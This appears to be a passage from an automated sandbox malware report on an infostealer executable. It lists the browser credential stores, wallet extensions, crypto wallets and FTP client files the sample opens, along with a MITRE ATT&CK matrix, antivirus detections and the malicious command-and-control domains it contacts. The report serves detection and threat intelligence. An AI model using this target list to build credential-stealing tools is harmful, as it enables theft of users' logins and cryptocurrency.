                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqliteJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.dbJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeDirectory queried: C:\Users\user\Documents\ZIPXYXWIOYJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeDirectory queried: C:\Users\user\Documents\ZIPXYXWIOYJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeDirectory queried: C:\Users\user\Documents\AQRFEVRTGLJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeDirectory queried: C:\Users\user\Documents\AQRFEVRTGLJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeDirectory queried: C:\Users\user\Documents\AQRFEVRTGLJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeDirectory queried: C:\Users\user\Documents\AQRFEVRTGLJump to behavior
                Source: Yara matchFile source: 00000000.00000003.2209696792.0000000000FE7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.2209553671.0000000000FE6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.2209596373.0000000000F8E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.2209761021.0000000000F91000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.2233422671.0000000000F91000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: MaZjv5XeQi.exe PID: 5608, type: MEMORYSTR

Remote Access Functionality

Source: Yara match | File source: Process Memory Space: MaZjv5XeQi.exe PID: 5608, type: MEMORYSTR
Source: Yara match | File source: sslproxydump.pcap, type: PCAP
Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR
MITRE ATT&CK Matrix (techniques listed per tactic column; the number in parentheses is the report's hit count for that technique)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media
Execution: Windows Management Instrumentation (12); Command and Scripting Interpreter (2); PowerShell (1); Cron; Launchd; Scheduled Task
Persistence: DLL Side-Loading (1); Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
Privilege Escalation: Process Injection (1); DLL Side-Loading (1); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
Defense Evasion: Virtualization/Sandbox Evasion (44); Process Injection (1); Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (3); Software Packing (12); DLL Side-Loading (1)
Credential Access: OS Credential Dumping (2); LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials
Discovery: Query Registry (1); Security Software Discovery (851); Virtualization/Sandbox Evasion (44); Process Discovery (2); File and Directory Discovery (1); System Information Discovery (223)
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC
Collection: Archive Collected Data (1); Data from Local System (41); Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture
Command and Control: Encrypted Channel (21); Ingress Tool Transfer (1); Non-Application Layer Protocol (3); Application Layer Protocol (114); Fallback Channels; Multiband Communication
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop

Antivirus detection for the submitted sample (Source | Detection | Scanner | Label):
MaZjv5XeQi.exe | 63% | ReversingLabs | Win32.Trojan.Symmi
MaZjv5XeQi.exe | 100% | Avira | TR/Crypt.XPACK.Gen
MaZjv5XeQi.exe | 100% | Joe Sandbox ML | -
No Antivirus matches
Antivirus detection for URLs (Source | Detection | Scanner | Label):
https://lev-tolstoi.com/u | 100% | Avira URL Cloud | malware
https://lev-tolstoi.com/MSWznTY69wwRW38B95y2 | 100% | Avira URL Cloud | malware
https://lev-tolstoi.com/apih3 | 100% | Avira URL Cloud | malware
https://checkout.steampow | 0% | Avira URL Cloud | safe
https://lev-tolstoi.com/api0GUP | 100% | Avira URL Cloud | malware
https://lev-tolstoi.com/apia3 | 100% | Avira URL Cloud | malware
https://lev-tolstoi.com/apixI | 100% | Avira URL Cloud | malware
https://steambroadcast-test.akamaizedH | 0% | Avira URL Cloud | safe
https://cdn.fastly.( | 0% | Avira URL Cloud | safe
https://lev-tolstoi.com/PPL | 100% | Avira URL Cloud | malware
https://lev-tolstoi.com/MSWznTY69wwRW38B95 | 100% | Avira URL Cloud | malware
https://lev-tolstoi.com/MSWznTY69wwRW38B95- | 100% | Avira URL Cloud | malware
https://lev-tolstoi.com/V4 | 100% | Avira URL Cloud | malware
https://lev-tolstoi.com/piy7 | 100% | Avira URL Cloud | malware
https://login.steamp | 0% | Avira URL Cloud | safe
https://lev-tolstoi.com/WC | 100% | Avira URL Cloud | malware
https://lev-tolstoi.com/apis | 100% | Avira URL Cloud | malware
Contacted domains (Name | IP | Active | Malicious | Antivirus Detection | Reputation):
steamcommunity.com | 104.102.49.254 | true | false | - | high
lev-tolstoi.com | 104.21.66.86 | true | false | - | high
wordyfindy.lat | unknown | unknown | false | - | high
slipperyloo.lat | unknown | unknown | false | - | high
curverpluch.lat | unknown | unknown | false | - | high
tentabatte.lat | unknown | unknown | false | - | high
manyrestro.lat | unknown | unknown | false | - | high
bashfulacid.lat | unknown | unknown | false | - | high
shapestickyr.lat | unknown | unknown | false | - | high
observerfry.lat | unknown | unknown | false | - | high
talkynicer.lat | unknown | unknown | false | - | high
Contacted URLs (Name | Malicious | Antivirus Detection | Reputation):
slipperyloo.lat | false | - | high
observerfry.lat | false | - | high
https://steamcommunity.com/profiles/76561199724331900 | false | - | high
https://lev-tolstoi.com/api | false | - | high
curverpluch.lat | false | - | high
tentabatte.lat | false | - | high
manyrestro.lat | false | - | high
bashfulacid.lat | false | - | high
URLs from memory and binary strings (Name | Source | Malicious | Antivirus Detection | Reputation):
https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png | MaZjv5XeQi.exe, 00000000.00000003.2109950925.0000000000FE5000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://duckduckgo.com/chrome_newtab | MaZjv5XeQi.exe, 00000000.00000003.2134675716.000000000575B000.00000004.00000800.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2134560297.000000000575B000.00000004.00000800.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2134507540.000000000575E000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://duckduckgo.com/ac/?q= | MaZjv5XeQi.exe, 00000000.00000003.2134675716.000000000575B000.00000004.00000800.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2134560297.000000000575B000.00000004.00000800.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2134507540.000000000575E000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&amp | MaZjv5XeQi.exe, 00000000.00000003.2109950925.0000000000FE5000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://lev-tolstoi.com/u | MaZjv5XeQi.exe, 00000000.00000002.2288722438.0000000000FF0000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2286575761.0000000000FE3000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2286634992.0000000000FEE000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://steamcommunity.com/?subsection=broadcasts | MaZjv5XeQi.exe, 00000000.00000003.2109950925.0000000000FE5000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743. | MaZjv5XeQi.exe, 00000000.00000003.2183906163.00000000057AB000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://store.steampowered.com/subscriber_agreement/ | MaZjv5XeQi.exe, 00000000.00000003.2109950925.0000000000FE5000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://lev-tolstoi.com/MSWznTY69wwRW38B95y2 | MaZjv5XeQi.exe, 00000000.00000003.2180876019.00000000057AC000.00000004.00000800.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2180972685.00000000057AC000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://www.valvesoftware.com/legal.htm | MaZjv5XeQi.exe, 00000000.00000003.2109950925.0000000000FE5000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA4X_n5-mo0&amp;l=en | MaZjv5XeQi.exe, 00000000.00000003.2109950925.0000000000FE5000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://www.youtube.com | MaZjv5XeQi.exe, 00000000.00000003.2110141184.0000000000F91000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2133467310.0000000000F8F000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2110007130.0000000000F8F000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2133542183.0000000000F91000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://www.google.com | MaZjv5XeQi.exe, 00000000.00000003.2110141184.0000000000F91000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2133467310.0000000000F8F000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2110007130.0000000000F8F000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2133542183.0000000000F91000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://lev-tolstoi.com/U | MaZjv5XeQi.exe, 00000000.00000002.2288722438.0000000000FF0000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2256416712.0000000000FE1000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2286575761.0000000000FE3000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2286634992.0000000000FEE000.00000004.00000020.00020000.00000000.sdmp | false | - | unknown
https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback | MaZjv5XeQi.exe, 00000000.00000003.2109950925.0000000000FE5000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6 | MaZjv5XeQi.exe, 00000000.00000003.2109950925.0000000000FE5000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2110007130.0000000000F5C000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&amp;l=engl | MaZjv5XeQi.exe, 00000000.00000003.2109950925.0000000000FE5000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&amp;l=englis | MaZjv5XeQi.exe, 00000000.00000003.2109950925.0000000000FE5000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbC | MaZjv5XeQi.exe, 00000000.00000003.2109950925.0000000000FE5000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://s.ytimg.com; | MaZjv5XeQi.exe, 00000000.00000003.2110141184.0000000000F91000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2110007130.0000000000F8F000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=FRRi | MaZjv5XeQi.exe, 00000000.00000003.2109950925.0000000000FE5000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2110007130.0000000000F5C000.00000004.00000020.00020000.00000000.sdmp | false | - | high
                                                                                            high
                                                                                            https://lev-tolstoi.com/api0GUPMaZjv5XeQi.exe, 00000000.00000003.2180876019.00000000057AC000.00000004.00000800.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2180972685.00000000057AC000.00000004.00000800.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2181402365.00000000057AF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: malware
                                                                                            unknown
                                                                                            https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1MaZjv5XeQi.exe, 00000000.00000003.2109950925.0000000000FE5000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2133421540.0000000000FF3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&amp;l=english&MaZjv5XeQi.exe, 00000000.00000003.2109950925.0000000000FE5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                https://community.fastly.steamstatic.com/MaZjv5XeQi.exe, 00000000.00000003.2110007130.0000000000F8F000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2133542183.0000000000F91000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://steam.tv/MaZjv5XeQi.exe, 00000000.00000003.2110141184.0000000000F91000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2133467310.0000000000F8F000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2110007130.0000000000F8F000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2133542183.0000000000F91000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    https://steambroadcast-test.akamaizedHMaZjv5XeQi.exe, 00000000.00000003.2110141184.0000000000F91000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2133467310.0000000000F8F000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2110007130.0000000000F8F000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2133542183.0000000000F91000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    unknown
                                                                                                    https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&amp;l=enMaZjv5XeQi.exe, 00000000.00000003.2109950925.0000000000FE5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      https://lev-tolstoi.com/MaZjv5XeQi.exe, 00000000.00000003.2240279376.0000000000FEE000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2286634992.0000000000FEE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        http://store.steampowered.com/privacy_agreement/MaZjv5XeQi.exe, 00000000.00000003.2109950925.0000000000FE5000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2133421540.0000000000FF3000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2110007130.0000000000F5C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          https://store.steampowered.com/points/shop/MaZjv5XeQi.exe, 00000000.00000003.2109950925.0000000000FE5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            https://lev-tolstoi.com/PPLMaZjv5XeQi.exe, 00000000.00000003.2110141184.0000000000F91000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2209596373.0000000000F8E000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2133467310.0000000000F8F000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000002.2288412972.0000000000F8E000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2110007130.0000000000F8F000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2133542183.0000000000F91000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2209761021.0000000000F91000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2233422671.0000000000F91000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            • Avira URL Cloud: malware
                                                                                                            unknown
                                                                                                            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=MaZjv5XeQi.exe, 00000000.00000003.2134675716.000000000575B000.00000004.00000800.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2134560297.000000000575B000.00000004.00000800.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2134507540.000000000575E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              http://crl.rootca1.amazontrust.com/rootca1.crl0MaZjv5XeQi.exe, 00000000.00000003.2181742814.00000000057D7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                https://lev-tolstoi.com/apia3MaZjv5XeQi.exe, 00000000.00000002.2288412972.0000000000F8E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                • Avira URL Cloud: malware
                                                                                                                unknown
                                                                                                                http://ocsp.rootca1.amazontrust.com0:MaZjv5XeQi.exe, 00000000.00000003.2181742814.00000000057D7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&amp;l=english&aMaZjv5XeQi.exe, 00000000.00000003.2109950925.0000000000FE5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    https://sketchfab.comMaZjv5XeQi.exe, 00000000.00000003.2110141184.0000000000F91000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2133467310.0000000000F8F000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2209761021.0000000000FCB000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2110007130.0000000000F8F000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2133542183.0000000000F91000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      https://www.ecosia.org/newtab/MaZjv5XeQi.exe, 00000000.00000003.2134675716.000000000575B000.00000004.00000800.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2134560297.000000000575B000.00000004.00000800.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2134507540.000000000575E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        https://lv.queniujq.cnMaZjv5XeQi.exe, 00000000.00000003.2110141184.0000000000F91000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2133467310.0000000000F8F000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2110007130.0000000000F8F000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2133542183.0000000000F91000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          https://steamcommunity.com/profiles/76561199724331900/inventory/MaZjv5XeQi.exe, 00000000.00000003.2109950925.0000000000FE5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brMaZjv5XeQi.exe, 00000000.00000003.2182887020.0000000005A4B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              https://www.youtube.com/MaZjv5XeQi.exe, 00000000.00000003.2110141184.0000000000F91000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2110007130.0000000000F8F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                https://store.steampowered.com/privacy_agreement/MaZjv5XeQi.exe, 00000000.00000003.2109950925.0000000000FE5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&amp;l=engMaZjv5XeQi.exe, 00000000.00000003.2109950925.0000000000FE5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    https://cdn.fastly.(MaZjv5XeQi.exe, 00000000.00000003.2110141184.0000000000F91000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2110007130.0000000000F8F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                    unknown
                                                                                                                                    https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&amp;l=english&amMaZjv5XeQi.exe, 00000000.00000003.2109950925.0000000000FE5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      https://www.google.com/recaptcha/MaZjv5XeQi.exe, 00000000.00000003.2110141184.0000000000F91000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2133467310.0000000000F8F000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2110007130.0000000000F8F000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2133542183.0000000000F91000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        high
